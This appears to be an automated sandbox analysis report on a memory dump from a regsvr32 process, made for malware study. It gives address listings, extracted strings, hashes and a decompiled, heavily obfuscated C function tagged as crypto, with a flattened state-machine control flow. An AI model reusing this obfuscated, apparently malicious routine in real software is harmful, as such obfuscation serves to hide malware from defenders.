0x04b91bff
0x04b91c0a
0x04b91c15
0x04b91c20
0x04b91c2b
0x04b91c36
0x04b91c41
0x04b91c4c
0x04b91c57
0x04b91c5f
0x04b91c67
0x04b91c6f
0x04b91c74
0x04b91c7c
0x04b91c7c
0x04b91c81
0x04b91c81
0x04b91c86
0x04b91c86
0x04b91c86
0x04b91c8b
0x04b91c8b
0x04b91c8b
0x04b91c8b
0x04b91c91
0x00000000
0x00000000
0x04b91c97
0x04b91f03
0x04b91f0a
0x04b91c7c
0x04b91c7c
0x00000000
0x04b91c7c
0x04b91c9d
0x04b91ca3
0x04b91e0d
0x04b91e19
0x04b91e1d
0x04b91e2b
0x04b91e3a
0x04b91e41
0x04b91e48
0x04b91e97
0x04b91ea7
0x04b91eb6
0x04b91ed6
0x04b91edb
0x04b91ee2
0x00000000
0x04b91ca9
0x04b91caf
0x04b91dfd
0x04b91e03
0x04b91c7c
0x04b91c7c
0x00000000
0x04b91c7c
0x04b91cb5
0x04b91cb7
0x04b91cf7
0x04b91d03
0x04b91d0a
0x04b91d1d
0x04b91d28
0x04b91d38
0x04b91d76
0x04b91d7b
0x04b91d7e
0x04b91d85
0x04b91dbe
0x04b91d87
0x04b91d9f
0x04b91daf
0x04b91db4
0x04b91db7
0x04b91db7
0x04b91de1
0x04b91de6
0x04b920f6
0x04b920f6
0x04b920fb
0x04b92100
0x04b92105
0x00000000
0x04b91cb9
0x04b91cbf
0x04b9212e
0x04b91cc5
0x04b91cc7
0x04b91ce3
0x04b91cea
0x04b91cf0
0x04b91cf2
0x04b91c7c
0x04b91c7c
0x04b91c81
0x04b91c86
0x04b91c86
0x00000000
0x04b91c86
0x04b91cc9
0x04b91ccf
0x00000000
0x04b91cd5
0x04b91cd5
0x00000000
0x04b91cd5
0x04b91ccf
0x04b91cc7
0x04b91cbf
0x04b91cb7
0x04b91caf
0x04b91ca3
0x04b92137
0x04b92141
0x04b92141
0x04b91f14
0x04b91f1a
0x04b9204f
0x04b9205b
0x04b92062
0x04b920c6
0x04b920dd
0x04b920ee
0x04b920f3
0x00000000
0x04b91f20
0x04b91f20
0x04b91f22
0x04b92038
0x04b9203d
0x04b92045
0x04b92047
0x00000000
0x04b91f28
0x04b91f28
0x04b91f2e
0x04b91ffc
0x04b92003
0x04b91c7c
0x04b91c7c
0x00000000
0x04b91c7c
0x04b91f34
0x04b91f34
0x04b91f3a
0x04b91f86
0x04b91fb6
0x04b91fbd
0x04b91fcc
0x04b91fce
0x04b91fd3
0x04b91fd8
0x00000000
0x04b91f3c
0x04b91f3c
0x04b91f3e
0x00000000
0x04b91f44
0x04b91f6f
0x04b91f71
0x04b91f76
0x00000000
0x04b91f76
0x04b91f3e
0x04b91f3a
0x04b91f2e
0x04b91f22
0x00000000
0x04b9210a
0x04b9210a
0x04b9210a
0x00000000
0x04b92116
0x04b91c86
0x04b91c81

Strings

2f, xrefs: 04B91956
o]n, xrefs: 04B91A6A
], xrefs: 04B91918
0H\, xrefs: 04B916ED
Na$, xrefs: 04B912C5
inpG, xrefs: 04B913FF
buV, xrefs: 04B91BE4
Xn!, xrefs: 04B91266
inpG, xrefs: 04B91419
x, xrefs: 04B915B4
SG<, xrefs: 04B91AB3
jW, xrefs: 04B9107F
2^~, xrefs: 04B9150A
y.n, xrefs: 04B91719
D)/, xrefs: 04B91C2B
nB[N, xrefs: 04B917C9
KN, xrefs: 04B9151A
R, xrefs: 04B91AF4

Memory Dump Source

Source File: 00000002.00000002.396391037.0000000004B81000.00000020.00000001.sdmp, Offset: 04B80000, based on PE: true

Associated: 00000002.00000002.396379915.0000000004B80000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.396440433.0000000004BA6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4b80000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: 0H\$2^~$D)/$KN$Na$$R$SG<$Xn!$buV$inpG$inpG$jW$nB[N$o]n$x$y.n$2f$]
API String ID: 0-421492616
Opcode ID: 9f07765a488e2731d0a13cd6d38779515b44a390ced39ada8e779ed987881158
Instruction ID: 4dc59c33c95454968d000da0dedaacc71152e260594243563b123fd45f46cf82
Opcode Fuzzy Hash: 9f07765a488e2731d0a13cd6d38779515b44a390ced39ada8e779ed987881158
Instruction Fuzzy Hash: F39200715093818FD778CF65C94AB9BBBE2FBC4304F10891DE69A8A260D7B19949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 04B92E5D, Relevance: 21.9, Strings: 17, Instructions: 653
COMMONCrypto

Download Yara Rule

C-Code - Quality: 76%

			E04B92E5D(int __ecx, signed int __edx) {
				char _v128;
				char _v256;
				char _v288;
				intOrPtr _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				signed int _v332;
				signed int _v336;
				signed int _v340;
				signed int _v344;
				unsigned int _v348;
				signed int _v352;
				signed int _v356;
				signed int _v360;
				signed int _v364;
				signed int _v368;
				signed int _v372;
				signed int _v376;
				signed int _v380;
				signed int _v384;
				signed int _v388;
				signed int _v392;
				unsigned int _v396;
				signed int _v400;
				signed int _v404;
				signed int _v408;
				signed int _v412;
				signed int _v416;
				signed int _v420;
				signed int _v424;
				signed int _v428;
				signed int _v432;
				signed int _v436;
				signed int _v440;
				signed int _v444;
				signed int _v448;
				signed int _v452;
				signed int _v456;
				signed int _v460;
				signed int _v464;
				signed int _v468;
				signed int _v472;
				unsigned int _v476;
				int _v480;
				signed int _v484;
				signed int _v488;
				signed int _v492;
				signed int _v496;
				signed int _v500;
				signed int _v504;
				signed int _v508;
				signed int _v512;
				signed int _v516;
				signed int _v520;
				signed int _v524;
				signed int _v528;
				unsigned int _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				unsigned int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				unsigned int _v576;
				void* _t707;
				void* _t708;
				signed int _t718;
				signed int _t732;
				signed int _t737;
				int _t740;
				void* _t742;
				void* _t750;
				signed int _t752;
				signed int _t758;
				signed int _t768;
				signed int _t769;
				intOrPtr _t770;
				int _t774;
				signed int _t786;
				void* _t832;
				void* _t833;
				void* _t836;
				void* _t837;
				signed int _t844;
				signed int _t845;
				signed int _t846;
				signed int _t847;
				signed int _t848;
				signed int _t849;
				signed int _t850;
				signed int _t851;
				signed int _t852;
				signed int _t853;
				signed int _t854;
				signed int _t855;
				signed int _t856;
				signed int _t857;
				signed int _t858;
				signed int _t859;
				signed int _t860;
				void* _t861;
				void* _t864;
				void* _t867;
				signed int _t870;
				unsigned int* _t871;
				void* _t875;

				_t774 = __ecx;
				_t871 =  &_v576;
				_v296 = __edx;
				_v480 = __ecx;
				_v420 = 0x6e1d72;
				_v420 = _v420 << 5;
				_v420 = _v420 * 0x3c;
				_t864 = 0xffd9b77;
				_v420 = _v420 ^ 0x39dcd700;
				_v532 = 0x1f7a5f;
				_t845 = 0xe;
				_v532 = _v532 / _t845;
				_v532 = _v532 ^ 0x6f56ef0e;
				_v532 = _v532 >> 0xa;
				_v532 = _v532 ^ 0x001a3d41;
				_v508 = 0xe1e69b;
				_v508 = _v508 + 0x2215;
				_v508 = _v508 + 0xffff2958;
				_v508 = _v508 + 0xffffaa0c;
				_v508 = _v508 ^ 0x00efd475;
				_v540 = 0xcd1956;
				_v540 = _v540 | 0x45240a95;
				_t846 = 0x77;
				_v540 = _v540 * 0x18;
				_v540 = _v540 ^ 0x336e332d;
				_v540 = _v540 ^ 0xbd574949;
				_v484 = 0x334a44;
				_v484 = _v484 ^ 0x919eff65;
				_v484 = _v484 / _t846;
				_v484 = _v484 | 0x2d19544d;
				_v484 = _v484 ^ 0x2d3e50ce;
				_v436 = 0x66ccc0;
				_v436 = _v436 + 0xffffec65;
				_t847 = 0x52;
				_v436 = _v436 * 0x24;
				_v436 = _v436 ^ 0x0e7c9935;
				_v492 = 0x2c49e8;
				_v492 = _v492 << 6;
				_v492 = _v492 << 2;
				_v492 = _v492 + 0xffff7e7f;
				_v492 = _v492 ^ 0x2c4d1795;
				_v348 = 0xb21165;
				_v348 = _v348 >> 0xb;
				_v348 = _v348 ^ 0x000033e8;
				_v464 = 0x27371d;
				_v464 = _v464 / _t847;
				_v464 = _v464 + 0xc709;
				_v464 = _v464 ^ 0x00086d33;
				_v476 = 0xe8a891;
				_v476 = _v476 >> 0xf;
				_v476 = _v476 + 0xffff587a;
				_v476 = _v476 ^ 0xfffd6e16;
				_v568 = 0xc76fce;
				_v568 = _v568 + 0xbc5c;
				_v568 = _v568 * 3;
				_v568 = _v568 | 0x5aa2bc40;
				_v568 = _v568 ^ 0x5afa6d0d;
				_v456 = 0xcc33e1;
				_v456 = _v456 ^ 0x6317d795;
				_v456 = _v456 | 0x1eb23508;
				_v456 = _v456 ^ 0x7ff946e0;
				_v560 = 0xede4ef;
				_v560 = _v560 + 0xffffe679;
				_t848 = 0x70;
				_v560 = _v560 / _t848;
				_v560 = _v560 << 5;
				_v560 = _v560 ^ 0x0043644b;
				_v500 = 0x670a53;
				_v500 = _v500 | 0x71b65663;
				_t849 = 0x2b;
				_v500 = _v500 * 0x3d;
				_v500 = _v500 + 0xfb01;
				_v500 = _v500 ^ 0x27fbe352;
				_v460 = 0x5f6e6b;
				_v460 = _v460 << 0xe;
				_v460 = _v460 | 0xdb801e45;
				_v460 = _v460 ^ 0xdb911bcb;
				_v404 = 0x155fb3;
				_v404 = _v404 + 0x82cf;
				_v404 = _v404 | 0x7954f6f3;
				_v404 = _v404 ^ 0x79505431;
				_v364 = 0x6447e1;
				_v364 = _v364 << 4;
				_v364 = _v364 ^ 0x064cce00;
				_v452 = 0x93f6b7;
				_v452 = _v452 | 0x0efbc074;
				_v452 = _v452 * 0x74;
				_v452 = _v452 ^ 0xca274b72;
				_v516 = 0x2e9555;
				_v516 = _v516 * 0x4d;
				_v516 = _v516 ^ 0x52348c71;
				_v516 = _v516 + 0xffff65c2;
				_v516 = _v516 ^ 0x5c3ff1c5;
				_v556 = 0x4e7cf7;
				_v556 = _v556 * 0x30;
				_v556 = _v556 ^ 0xab1a74ca;
				_v556 = _v556 | 0x39490d7c;
				_v556 = _v556 ^ 0xbde6ca21;
				_v304 = 0x79a99e;
				_v304 = _v304 | 0x92bbf026;
				_v304 = _v304 ^ 0x92fabbf2;
				_v444 = 0xf2d903;
				_v444 = _v444 * 0x13;
				_v444 = _v444 << 3;
				_v444 = _v444 ^ 0x90370785;
				_v388 = 0xce947f;
				_v388 = _v388 + 0xf4e6;
				_v388 = _v388 + 0xffffe2fa;
				_v388 = _v388 ^ 0x00c891aa;
				_v440 = 0x3724ee;
				_v440 = _v440 ^ 0xc994252f;
				_v440 = _v440 + 0xffff9dbe;
				_v440 = _v440 ^ 0xc9a5a4c3;
				_v544 = 0x9c24f5;
				_v544 = _v544 >> 8;
				_v544 = _v544 * 0x12;
				_v544 = _v544 + 0xb91e;
				_v544 = _v544 ^ 0x0007bff8;
				_v448 = 0x5ce888;
				_v448 = _v448 / _t849;
				_v448 = _v448 ^ 0x9d1dcba1;
				_v448 = _v448 ^ 0x9d138551;
				_v552 = 0x5ae9b7;
				_v552 = _v552 + 0xffffcdd3;
				_v552 = _v552 >> 0xa;
				_v552 = _v552 >> 3;
				_v552 = _v552 ^ 0x000286f6;
				_v372 = 0x1cfcf8;
				_v372 = _v372 << 0x10;
				_v372 = _v372 ^ 0xfcf9df5b;
				_v572 = 0x7fff3;
				_v572 = _v572 << 3;
				_v572 = _v572 | 0xc07f6c1b;
				_t850 = 0x6c;
				_v572 = _v572 / _t850;
				_v572 = _v572 ^ 0x01c5e077;
				_v468 = 0xb8a28e;
				_v468 = _v468 >> 0xa;
				_t851 = 7;
				_v468 = _v468 * 0x38;
				_v468 = _v468 ^ 0x0004661e;
				_v472 = 0x1c4be2;
				_v472 = _v472 >> 0xb;
				_v472 = _v472 / _t851;
				_v472 = _v472 ^ 0x000b37fd;
				_v324 = 0x397321;
				_v324 = _v324 + 0x4649;
				_v324 = _v324 ^ 0x003dbcde;
				_v564 = 0x90a3d2;
				_v564 = _v564 >> 0xf;
				_v564 = _v564 | 0x55e281c1;
				_v564 = _v564 + 0xffff9c60;
				_v564 = _v564 ^ 0x55ec6797;
				_v524 = 0x36ce4e;
				_v524 = _v524 + 0x9321;
				_v524 = _v524 ^ 0x68577083;
				_v524 = _v524 + 0x842e;
				_v524 = _v524 ^ 0x686a3805;
				_v380 = 0xf92015;
				_t852 = 0x57;
				_v380 = _v380 * 0x31;
				_v380 = _v380 ^ 0x2faa62dc;
				_v428 = 0xf06949;
				_v428 = _v428 ^ 0xe190386e;
				_v428 = _v428 | 0xd7c767f0;
				_v428 = _v428 ^ 0xf7e62dec;
				_v316 = 0x53402;
				_v316 = _v316 ^ 0x1a7eacd5;
				_v316 = _v316 ^ 0x1a780dc3;
				_v396 = 0xea020b;
				_v396 = _v396 / _t852;
				_v396 = _v396 >> 7;
				_v396 = _v396 ^ 0x0007fa92;
				_v576 = 0x94f18;
				_v576 = _v576 + 0x323;
				_t853 = 0x5a;
				_v576 = _v576 / _t853;
				_v576 = _v576 >> 7;
				_v576 = _v576 ^ 0x0009d62c;
				_v340 = 0x5ab89e;
				_v340 = _v340 + 0xcec5;
				_v340 = _v340 ^ 0x005981b9;
				_v424 = 0xf4fb06;
				_v424 = _v424 << 0xf;
				_v424 = _v424 + 0x6e15;
				_v424 = _v424 ^ 0x7d84f79d;
				_v308 = 0xe5ad48;
				_v308 = _v308 + 0xffff809e;
				_v308 = _v308 ^ 0x00e6a4ab;
				_v432 = 0xc8665e;
				_v432 = _v432 | 0xb25d9dfb;
				_v432 = _v432 * 0x51;
				_v432 = _v432 ^ 0x9835fda6;
				_v536 = 0x3c612a;
				_v536 = _v536 ^ 0xe3614c8f;
				_v536 = _v536 + 0x89b2;
				_v536 = _v536 >> 3;
				_v536 = _v536 ^ 0x1c61cdd9;
				_v312 = 0xb1cab1;
				_v312 = _v312 + 0x5335;
				_v312 = _v312 ^ 0x00b6c298;
				_v332 = 0x3dadc5;
				_v332 = _v332 >> 0xf;
				_v332 = _v332 ^ 0x00096a38;
				_v320 = 0xd2cf6d;
				_t854 = 0x5e;
				_v320 = _v320 / _t854;
				_v320 = _v320 ^ 0x000f4fea;
				_v528 = 0xbc9a67;
				_t768 = 0x35;
				_v528 = _v528 / _t768;
				_v528 = _v528 ^ 0x531db0de;
				_v528 = _v528 << 2;
				_v528 = _v528 ^ 0x4c7ccc72;
				_v368 = 0x9c5377;
				_v368 = _v368 | 0xa0dcba47;
				_v368 = _v368 ^ 0xa0d1bf3f;
				_v416 = 0x1ec4a4;
				_t855 = 0x79;
				_v416 = _v416 * 0x28;
				_v416 = _v416 / _t855;
				_v416 = _v416 ^ 0x00072384;
				_v376 = 0x2ac77;
				_v376 = _v376 << 0xf;
				_v376 = _v376 ^ 0x563f0855;
				_v412 = 0x448f7a;
				_v412 = _v412 << 0xd;
				_v412 = _v412 >> 2;
				_v412 = _v412 ^ 0x24738c34;
				_v356 = 0xc97c1e;
				_v356 = _v356 ^ 0x373e9b5c;
				_v356 = _v356 ^ 0x37f1bea5;
				_v548 = 0xc08620;
				_t856 = 0x3e;
				_v548 = _v548 * 0x48;
				_v548 = _v548 >> 0xe;
				_v548 = _v548 + 0x8cd4;
				_v548 = _v548 ^ 0x00077c97;
				_v504 = 0x1bacca;
				_v504 = _v504 / _t856;
				_v504 = _v504 + 0xffff3533;
				_v504 = _v504 + 0xffffc69c;
				_v504 = _v504 ^ 0xfffb1415;
				_v512 = 0x4f44ee;
				_v512 = _v512 + 0x177f;
				_v512 = _v512 + 0xce0c;
				_v512 = _v512 << 2;
				_v512 = _v512 ^ 0x014cc697;
				_v360 = 0x8b661;
				_t857 = 0x1e;
				_v360 = _v360 / _t857;
				_v360 = _v360 ^ 0x000dc15c;
				_v520 = 0xb38031;
				_v520 = _v520 | 0xa1714482;
				_t858 = 0x36;
				_t870 = _v296;
				_v520 = _v520 * 0x52;
				_v520 = _v520 + 0xc23a;
				_v520 = _v520 ^ 0xe016b971;
				_v496 = 0x319ddd;
				_v496 = _v496 / _t858;
				_t859 = 0x3b;
				_t860 = _v296;
				_v496 = _v496 / _t859;
				_v496 = _v496 + 0xffffa02a;
				_v496 = _v496 ^ 0xfff3e4c0;
				_v352 = 0x3691e9;
				_t769 = _v296;
				_v352 = _v352 / _t768;
				_v352 = _v352 ^ 0x000e8b32;
				_v408 = 0x2ac6b;
				_v408 = _v408 * 0x5a;
				_v408 = _v408 << 9;
				_v408 = _v408 ^ 0xe13230fa;
				_v392 = 0x204939;
				_v392 = _v392 + 0x4ed4;
				_v392 = _v392 * 0x35;
				_v392 = _v392 ^ 0x06bd0f48;
				_v336 = 0x1179fc;
				_v336 = _v336 + 0xffff73d1;
				_v336 = _v336 ^ 0x0013f977;
				_v400 = 0xb07871;
				_v400 = _v400 >> 3;
				_v400 = _v400 | 0xc580b254;
				_v400 = _v400 ^ 0xc59d0b5c;
				_v344 = 0x9fe4dd;
				_v344 = _v344 << 0xe;
				_v344 = _v344 ^ 0xf932a85a;
				_v328 = 0xd2ff81;
				_v328 = _v328 ^ 0x82aa1598;
				_v328 = _v328 ^ 0x827d602f;
				_v488 = 0x92e76b;
				_v488 = _v488 | 0x6946c4e8;
				_v488 = _v488 + 0xbbca;
				_v488 = _v488 * 0x54;
				_v488 = _v488 ^ 0xbac9f786;
				_v384 = 0xafba80;
				_v384 = _v384 ^ 0x0a481803;
				_v384 = _v384 << 6;
				_v384 = _v384 ^ 0xb9e44209;
				while(1) {
					L1:
					_t707 = 0x9c71ab3;
					do {
						while(1) {
							L2:
							_t875 = _t864 - 0x86fed85;
							if(_t875 <= 0) {
								break;
							}
							__eflags = _t864 - _t707;
							if(__eflags == 0) {
								_push(_v432);
								_t770 = _t860 + _t870;
								_push(_v308);
								_push(0x4b81808);
								_v292 = _t770;
								_t708 = E04B94244(_v340, _v424, __eflags);
								__eflags = _t770 - _t870;
								_t769 = E04B9E1AC(_v536, _t770 - _t870, _t870,  &_v256, _v312,  &_v288, _v332,  &_v128, _v320, _t770 - _t870) + _t870;
								E04B9FECB(_t708, _v528, _v368, _v416, _v376);
								_t774 = _v480;
								_t871 =  &(_t871[0xe]);
								_t864 = 0x1bf95f7;
								_t707 = 0x9c71ab3;
								goto L31;
							}
							__eflags = _t864 - 0xe33788a;
							if(_t864 == 0xe33788a) {
								_t860 = 0x4000;
								_push(_t774);
								_push(_t774);
								_t758 = E04B8C5D8(0x4000);
								_t871 =  &(_t871[3]);
								_v300 = _t758;
								__eflags = _t758;
								if(__eflags == 0) {
									return _t758;
								}
								_t864 = 0x77316ed;
								L14:
								_t774 = _v480;
								while(1) {
									L1:
									_t707 = 0x9c71ab3;
									goto L2;
								}
							}
							__eflags = _t864 - 0xf34fc82;
							if(_t864 == 0xf34fc82) {
								_push(_t774);
								_push(_t774);
								_t860 = E04B9CCA0(4, 0x10);
								_push( &_v128);
								_push(_t860);
								_push(_v560);
								_t833 = 0xb;
								E04B8E404(_v456, _t833);
								_t864 = 0x5f37ccd;
								L13:
								_t871 =  &(_t871[7]);
								goto L14;
							}
							__eflags = _t864 - 0xfefbdda;
							if(_t864 == 0xfefbdda) {
								E04BA2B09(_v328, _v300, _v488, _v384);
								return 0;
							}
							__eflags = _t864 - 0xffd9b77;
							if(__eflags != 0) {
								goto L31;
							}
							_t864 = 0x17d426e;
						}
						if(_t875 == 0) {
							_t860 = _t860 +  *((intOrPtr*)(_t774 + 4));
							_push(_t774);
							_push(_t774);
							_t718 = E04B8C5D8(_t860);
							_t774 = _v480;
							_t870 = _t718;
							_t871 =  &(_t871[3]);
							__eflags = _t870;
							_t707 = 0x9c71ab3;
							_t864 =  !=  ? 0x9c71ab3 : 0xfefbdda;
							goto L2;
						}
						if(_t864 == 0x17d426e) {
							_push(_t774);
							_push(_t774);
							_t860 = E04B9CCA0(1, 8);
							_push( &_v288);
							_push(_t860);
							_push(_v492);
							_t832 = 9;
							E04B8E404(_v436, _t832);
							_t864 = 0xf34fc82;
							goto L13;
						}
						if(_t864 == 0x1bf95f7) {
							E04B9C9B0(_v412, _t769, _v356,  *((intOrPtr*)(_t774 + 4)),  *_t774, _v548);
							_t774 = _v480;
							_t871 =  &(_t871[4]);
							_t864 = 0x7c1f8ac;
							_t769 = _t769 +  *((intOrPtr*)(_t774 + 4));
							goto L1;
						}
						if(_t864 == 0x5f37ccd) {
							_t867 =  &_v256;
							_push(_t774);
							_push(_t774);
							_t836 = E04B9CCA0(8, 0x10);
							_t871 =  &(_t871[4]);
							_t732 = _v420;
							__eflags = _t732 - _t836;
							if(_t732 < _t836) {
								_t844 = _t836 - _t732;
								_t861 = _t867;
								_t786 = _t844 >> 1;
								__eflags = _t786;
								_t740 = memset(_t861, 0x2d002d, _t786 << 2);
								asm("adc ecx, ecx");
								_t867 = _t867 + _t844 * 2;
								memset(_t861 + _t786, _t740, 0);
								_t871 =  &(_t871[6]);
								_t774 = 0;
							}
							_push(_t774);
							_push(_t774);
							_t737 = E04B9CCA0(8, 0x10);
							_push(_t867);
							_t860 = _t737;
							_push(_t860);
							_push(_v388);
							_t837 = 0xb;
							E04B8E404(_v444, _t837);
							_t864 = 0xe33788a;
							goto L13;
						}
						if(_t864 == 0x77316ed) {
							_push(_v472);
							_push(_v468);
							_push(_v572);
							_t742 = E04B9E1F8(0x4b817a8, _v372, __eflags);
							_t871 =  &(_t871[3]);
							_push( &_v256);
							_push(_t742);
							_push(_t860);
							_push(_v300);
							 *((intOrPtr*)(E04BA31AA(0xb00b1257, 0x44)))();
							E04B9FECB(_t742, _v324, _v564, _v524, _v380);
							_t864 = 0x86fed85;
							goto L13;
						}
						_t880 = _t864 - 0x7c1f8ac;
						if(_t864 != 0x7c1f8ac) {
							goto L31;
						}
						_push(_v520);
						_push(_v360);
						_push(0x4b81778);
						_t750 = E04B83325( &_v256, E04B94244(_v504, _v512, _t880), _v292 - _t769, _v352, _v408, _t769);
						E04B9FECB(_t747, _v392, _v336, _v400, _v344);
						_t752 = _v296;
						 *_t752 = _t870;
						 *((intOrPtr*)(_t752 + 4)) = _t769 + _t750 - _t870;
						L10:
						return _v300;
						L31:
						__eflags = _t864 - 0xc7faa3a;
					} while (__eflags != 0);
					goto L10;
				}
			}

0x04b92e5d
0x04b92e5d
0x04b92e67
0x04b92e6e
0x04b92e72
0x04b92e7d
0x04b92e8d
0x04b92e94
0x04b92e99
0x04b92ea4
0x04b92eb4
0x04b92eb9
0x04b92ebf
0x04b92ec7
0x04b92ecc
0x04b92ed4
0x04b92edc
0x04b92ee4
0x04b92eec
0x04b92ef4
0x04b92efc
0x04b92f04
0x04b92f11
0x04b92f14
0x04b92f18
0x04b92f20
0x04b92f28
0x04b92f30
0x04b92f40
0x04b92f44
0x04b92f4c
0x04b92f54
0x04b92f5f
0x04b92f72
0x04b92f73
0x04b92f7a
0x04b92f85
0x04b92f8d
0x04b92f92
0x04b92f97
0x04b92f9f
0x04b92fa7
0x04b92fb2
0x04b92fba
0x04b92fc5
0x04b92fd9
0x04b92fe0
0x04b92feb
0x04b92ff6
0x04b92ffe
0x04b93003
0x04b9300b
0x04b93013
0x04b9301b
0x04b93028
0x04b9302c
0x04b93034
0x04b9303c
0x04b93047
0x04b93052
0x04b9305d
0x04b93068
0x04b93070
0x04b93080
0x04b93085
0x04b9308b
0x04b93090
0x04b93098
0x04b930a0
0x04b930ad
0x04b930ae
0x04b930b2
0x04b930ba
0x04b930c2
0x04b930cd
0x04b930d5
0x04b930e0
0x04b930eb
0x04b930f6
0x04b93101
0x04b9310c
0x04b93117
0x04b93122
0x04b9312a
0x04b93135
0x04b93140
0x04b93153
0x04b9315a
0x04b93165
0x04b93172
0x04b93176
0x04b9317e
0x04b93186
0x04b9318e
0x04b9319b
0x04b9319f
0x04b931a7
0x04b931af
0x04b931b7
0x04b931c2
0x04b931cd
0x04b931d8
0x04b931eb
0x04b931f2
0x04b931fa
0x04b93205
0x04b93210
0x04b9321b
0x04b93226
0x04b93231
0x04b9323c
0x04b93247
0x04b93252
0x04b9325d
0x04b93265
0x04b9326f
0x04b93273
0x04b9327b
0x04b93283
0x04b93297
0x04b9329e
0x04b932a9
0x04b932b4
0x04b932bc
0x04b932c4
0x04b932c9
0x04b932ce
0x04b932d6
0x04b932e1
0x04b932e9
0x04b932f4
0x04b932fe
0x04b93303
0x04b93311
0x04b93316
0x04b9331c
0x04b93324
0x04b9332f
0x04b9333f
0x04b93342
0x04b93349
0x04b93354
0x04b9335c
0x04b93369
0x04b9336d
0x04b93375
0x04b93380
0x04b9338b
0x04b93396
0x04b9339e
0x04b933a3
0x04b933ab
0x04b933b3
0x04b933bb
0x04b933c3
0x04b933cb
0x04b933d3
0x04b933db
0x04b933e3
0x04b933f6
0x04b933f9
0x04b93400
0x04b9340b
0x04b93416
0x04b93421
0x04b9342c
0x04b93437
0x04b93442
0x04b9344d
0x04b93458
0x04b9346e
0x04b93475
0x04b9347d
0x04b93488
0x04b93490
0x04b9349c
0x04b9349f
0x04b934a3
0x04b934a8
0x04b934b0
0x04b934bb
0x04b934c6
0x04b934d1
0x04b934dc
0x04b934e4
0x04b934ef
0x04b934fa
0x04b93505
0x04b93510
0x04b9351b
0x04b93526
0x04b93539
0x04b93540
0x04b9354d
0x04b93555
0x04b9355d
0x04b93565
0x04b9356a
0x04b93572
0x04b9357d
0x04b93588
0x04b93593
0x04b9359e
0x04b935a6
0x04b935b1
0x04b935c5
0x04b935ca
0x04b935d3
0x04b935de
0x04b935ea
0x04b935ef
0x04b935f5
0x04b935fd
0x04b93602
0x04b9360a
0x04b93615
0x04b93620
0x04b9362b
0x04b9363e
0x04b93641
0x04b93653
0x04b9365a
0x04b93665
0x04b93670
0x04b93678
0x04b93683
0x04b9368e
0x04b93696
0x04b9369e
0x04b936a9
0x04b936b4
0x04b936bf
0x04b936ca
0x04b936d7
0x04b936da
0x04b936de
0x04b936e3
0x04b936eb
0x04b936f3
0x04b93703
0x04b93707
0x04b9370f
0x04b93717
0x04b9371f
0x04b93727
0x04b9372f
0x04b93737
0x04b9373c
0x04b93744
0x04b93756
0x04b93759
0x04b93760
0x04b9376d
0x04b93775
0x04b93784
0x04b93787
0x04b9378e
0x04b93792
0x04b9379a
0x04b937a2
0x04b937b2
0x04b937ba
0x04b937bf
0x04b937c6
0x04b937ca
0x04b937d2
0x04b937da
0x04b937ee
0x04b937f5
0x04b937fc
0x04b93807
0x04b9381a
0x04b93821
0x04b93829
0x04b93834
0x04b9383f
0x04b93852
0x04b93859
0x04b93864
0x04b9386f
0x04b9387a
0x04b93885
0x04b93890
0x04b93898
0x04b938a3
0x04b938ae
0x04b938b9
0x04b938c1
0x04b938cc
0x04b938d7
0x04b938e2
0x04b938ed
0x04b938f5
0x04b938fd
0x04b9390a
0x04b9390e
0x04b93916
0x04b93921
0x04b9392c
0x04b93934
0x04b9393f
0x04b9393f
0x04b9393f
0x04b93944
0x04b93944
0x04b93944
0x04b93944
0x04b9394a
0x00000000
0x00000000
0x04b93be6
0x04b93be8
0x04b93ca8
0x04b93caf
0x04b93cb2
0x04b93cc7
0x04b93ccc
0x04b93cd3
0x04b93cda
0x04b93d26
0x04b93d34
0x04b93d39
0x04b93d40
0x04b93d43
0x04b93d48
0x00000000
0x04b93d48
0x04b93bee
0x04b93bf4
0x04b93c6d
0x04b93c84
0x04b93c85
0x04b93c87
0x04b93c8c
0x04b93c8f
0x04b93c96
0x04b93c98
0x04b93a22
0x04b93a22
0x04b93c9e
0x04b93a8d
0x04b93a8d
0x04b9393f
0x04b9393f
0x04b9393f
0x00000000
0x04b9393f
0x04b9393f
0x04b93bf6
0x04b93bfc
0x04b93c36
0x04b93c37
0x04b93c41
0x04b93c4a
0x04b93c4b
0x04b93c4c
0x04b93c59
0x04b93c5a
0x04b93c5f
0x04b93a8a
0x04b93a8a
0x00000000
0x04b93a8a
0x04b93bfe
0x04b93c04
0x04b93d77
0x00000000
0x04b93d7e
0x04b93c0a
0x04b93c10
0x00000000
0x00000000
0x04b93c16
0x04b93c16
0x04b93950
0x04b93bb0
0x04b93bc1
0x04b93bc2
0x04b93bc4
0x04b93bc9
0x04b93bcd
0x04b93bcf
0x04b93bd7
0x04b93bd9
0x04b93bde
0x00000000
0x04b93bde
0x04b9395c
0x04b93b72
0x04b93b73
0x04b93b7d
0x04b93b86
0x04b93b87
0x04b93b88
0x04b93b95
0x04b93b96
0x04b93b9b
0x00000000
0x04b93b9b
0x04b93968
0x04b93b46
0x04b93b4b
0x04b93b52
0x04b93b55
0x04b93b5a
0x00000000
0x04b93b5a
0x04b93974
0x04b93a9d
0x04b93ab6
0x04b93ab7
0x04b93ac1
0x04b93ac3
0x04b93ac6
0x04b93acd
0x04b93acf
0x04b93ad1
0x04b93ad3
0x04b93adc
0x04b93adc
0x04b93ade
0x04b93ae0
0x04b93ae2
0x04b93ae5
0x04b93ae5
0x04b93ae5
0x04b93ae5
0x04b93afe
0x04b93aff
0x04b93b04
0x04b93b09
0x04b93b0a
0x04b93b0c
0x04b93b0d
0x04b93b1d
0x04b93b1e
0x04b93b23
0x00000000
0x04b93b23
0x04b93980
0x04b93a23
0x04b93a2c
0x04b93a33
0x04b93a3e
0x04b93a43
0x04b93a54
0x04b93a55
0x04b93a56
0x04b93a57
0x04b93a66
0x04b93a80
0x04b93a85
0x00000000
0x04b93a85
0x04b93986
0x04b9398c
0x00000000
0x00000000
0x04b93992
0x04b93996
0x04b939a5
0x04b939d6
0x04b939fb
0x04b93a00
0x04b93a0c
0x04b93a0e
0x04b93a11
0x00000000
